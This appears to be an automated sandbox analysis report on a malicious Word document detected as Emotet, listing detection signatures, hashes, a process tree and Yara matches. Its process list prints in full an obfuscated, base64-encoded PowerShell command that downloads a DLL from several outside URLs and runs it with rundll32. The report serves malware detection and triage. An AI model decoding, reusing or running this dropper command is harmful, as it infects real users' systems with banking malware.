Play interactive tour

Edit tour

Analysis Report N00048481397007.doc

Overview

General Information

Sample Name:	N00048481397007.doc
Analysis ID:	343979
MD5:	ad7db0f946bc5c3bb051cb04f359e6a4
SHA1:	24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256:	4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Obfuscated command line found

Potential dropper URLs found in powershell memory

Powershell drops PE file

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2124 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 1428 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2376 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

rundll32.exe (PID: 172 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1084 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1072 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

powershell.exe (PID: 2280 cmdline: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 3016 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2940 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2184 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2228 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2376 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
